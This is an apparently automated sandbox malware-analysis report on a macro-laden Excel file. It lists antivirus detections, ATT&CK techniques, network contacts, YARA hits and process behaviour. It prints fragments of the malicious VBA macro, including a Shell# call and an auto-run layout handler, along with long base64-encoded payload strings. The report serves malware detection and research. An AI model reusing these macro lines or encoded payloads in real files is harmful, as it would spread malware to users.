Analysis Report XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

Overview

General Information

Joe Sandbox Version:	25.0.0 Tiger's Eye
Analysis ID:	800718
Start date:	28.02.2019
Start time:	14:44:05
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled GSI enabled (VBA)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.expl.evad.winXLS@25/38@6/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, powershell.exe, csc.exe, csc.exe

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	88	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Command-Line Interface21	Winlogon Helper DLL	Process Injection1	Disabling Security Tools11	Credential Dumping	Process Discovery1	Application Deployment Software	Data from Local System	Data Encrypted1	Standard Non-Application Layer Protocol2
Replication Through Removable Media	PowerShell2	Port Monitors	Accessibility Features	Process Injection1	Network Sniffing	Security Software Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol2
Drive-by Compromise	Scripting32	Accessibility Features	Path Interception	Deobfuscate/Decode Files or Information1	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol
Exploit Public-Facing Application	Exploitation for Client Execution13	System Firmware	DLL Search Order Hijacking	Scripting32	Credentials in Files	System Network Configuration Discovery1	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Masquerading	Account Manipulation	File and Directory Discovery1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	DLL Search Order Hijacking	Brute Force	System Information Discovery21	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for submitted file

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

Avira: Label: X97M/Agent.1199011

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: i.imgur.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49224 -> 151.101.36.193:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49224 -> 151.101.36.193:443

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View	IP Address: 151.101.36.193 151.101.36.193
Source: Joe Sandbox View	IP Address: 216.239.34.21 216.239.34.21
Source: Joe Sandbox View	IP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox View	IP Address: 216.239.32.21 216.239.32.21

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: unknown unknown

JA3 SSL client fingerprint seen in connection with other malware

Show sources

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO

Jump to behavior

Found strings which match to known social media urls

Show sources

Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: i.imgur.com

Urls found in memory or binary data

Show sources

Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	String found in binary or memory: http://apps.identrust.com
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootC
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRoot
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabW
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.c
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0F
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp	String found in binary or memory: http://oi65.tinypic.com/2z8thcz.jpg
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp	String found in binary or memory: https://i.imgur.com
Source: powershell.exe, 00000009.00000002.1774266374.002CB000.00000004.sdmp	String found in binary or memory: https://i.imgur.com/96vV0YR.png
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp	String found in binary or memory: https://i.imgur.com/96vV0YR.pngH
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmp	String found in binary or memory: https://ipinfo.io/country8
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmp	String found in binary or memory: https://ipinfo.io/countryx
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmp	String found in binary or memory: https://ipinfo.ioH
Source: powershell.exe, 00000004.00000002.1679759349.056B0000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmp	String found in binary or memory: https://ipinfo.ioh%
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443

E-Banking Fraud:

Drops certificate files (DER)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	OLE, VBA macro line: If opa > xlBinsTypeBinSize * 347 - 1.07 Then ShowFormatTabs Else Application.Quit
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	OLE, VBA macro line: FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SensetiveLine, String application.quit: Application.Quit	Name: SensetiveLine
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function ShowFormatTabs, String shell#: FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)	Name: ShowFormatTabs

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function tiga, String qIYZn9Ht2um2m0iwVt4AA4ggYomdM56/MY2iQYuwNs8c4xuvFnD6gRhxnG1q+gpLTtjsMA6Ierk4kloEe6HL9aRgOh/shc1Mnu7FHFEsO7bmDBQ3LjROTzBZTBPdbbOKKsfFTWv6HTyMkmO3HbrWqGS2npvPS1OO4EXuzHuFL2FSAynlMeUPGpcwlL2fUe7pjr29kJxlQN35WaDzD29+JzgHRedSug6xirvFY0neHRMhxj9O5N7JcPYGgIEP3LKMk8LmTgce/XDbmoUFO/8wyIrGnRF49sVPlSnyPdTWIMzbrqCh83Qxwvq1sCj8Ju3p263QN4pSek6kf2K/OcggmF84+HSlJTXODz+U7XEtPNxAHDkkbJDtFTEx8Fd72gFn77dSgC7VCXjc6vHtzbJdj0GHr61Fq3dag7OcZEupjYqzWtWe1C3SYdhBpUHuC81vDyT8Cp9nCyk2jlbXjzBmlH1ORRccevKACeO99EFUUeekaN1gESmt0OuVKyQCjxZ6V5b04nqphnvlGkGdG5I6LUwrmu7aeV2svPpj8jtIsMRczxdQfCNw/dJtxb0BYnYXVk2nZfTu8LNWlN3TxDY1dcH/JabHwLKINn60byPed3XTtLlfqpvGHZYYhn3yZnwjlFPJDpLzHZkj+4ozmie5TOYCn3N3w4x+YhrCbxcePmKbHaLxh2bV8nifDlmhYOX79As7OmUQkSBB6cuUl7y6dGMcLXNcRT5P2YVxFOTpWGBdrm6V4HQo+6l0CbkOSZRS0WUvHgvVH0aKUcBmfvXhaTkgqxfH+Z2tgyLqzvqEEFBM8UlsgRYu+7jFtV9Fijsm/Eyi5MUVESxzokrwKSpaSklweDxZVVrxE2WO5KCbKGmxz79fm7qbnnx/1NFVGzHdKuJ9+q2WvY9+dptMIAvgruzohvn0GPsdc8UfVLcrqSODJ6WBL58M+pj/2He7+g846X7gfB6dTF4rnYzinSTn
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function tiga, String SZCSUSdQxNB0jSdR2jWPZ0lNFVf9pJSDfzrYs477+UuEreRSmSc0wkO5c+vNKJsKVAlN/ddPoTIX76bBsOvD5sd5aoAhu79t2Kdf7sjzWrtjtlyP4d3Gl9KW+de/687TUkuEQw5d1N5MDzRm84m2pHuNXXJiob70vQE3+KOBKFjyaGbPLbZfkL/9ks+p//+7Y//+usPv/v6y59//P1Xv/vlP+m7v3z9wzffp0+/+XP68sdvf/4mfZH/3X78In3+3+f0+XP6P

Document contains an embedded VBA with hexadecimal encoded strings

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function OwFormat, String qy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mIP9tIhBT3RfRwrcNb1PwFxDpNZEnoOKAu7Df55hkg2RMuYzhCkAy4gltWKn6fTQvifLCg50HErnBQYu4IYgQ/0u0Bvztp+QNkFAfZl9EQ/NvNwqIOWCMoIKpAX6FA/iiA

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 151.101.36.193 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 216.239.32.21 443	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 216.239.34.21 443

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 6831
Source: unknown	Process created: Commandline size = 6831
Source: unknown	Process created: Commandline size = 6831
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: Commandline size = 6831	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: Commandline size = 6831	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: Commandline size = 6831	Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	OLE, VBA macro line: Private Sub Frame1_Layout()
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function Frame1_Layout			Name: Frame1_Layout

Document contains embedded VBA macros

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

OLE indicator, VBA macros: true

PE file does not import any functions

Show sources

Source: h2oah0u7.dll.13.dr	Static PE information: No import functions for PE file found
Source: ua6j8io5.dll.5.dr	Static PE information: No import functions for PE file found
Source: 3ndkwphw.dll.14.dr	Static PE information: No import functions for PE file found

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Yara signature match

Show sources

Source: 0000000C.00000002.1774294244.00330000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1674260172.01880000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1774174716.00260000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1781857851.045C0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774152919.00260000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000000.1713368455.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000003.1708252755.002A8000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.1637989998.001DA000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1679049173.04370000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000003.1635248316.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000003.1705531360.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1781647232.04430000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1780389444.03EA0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
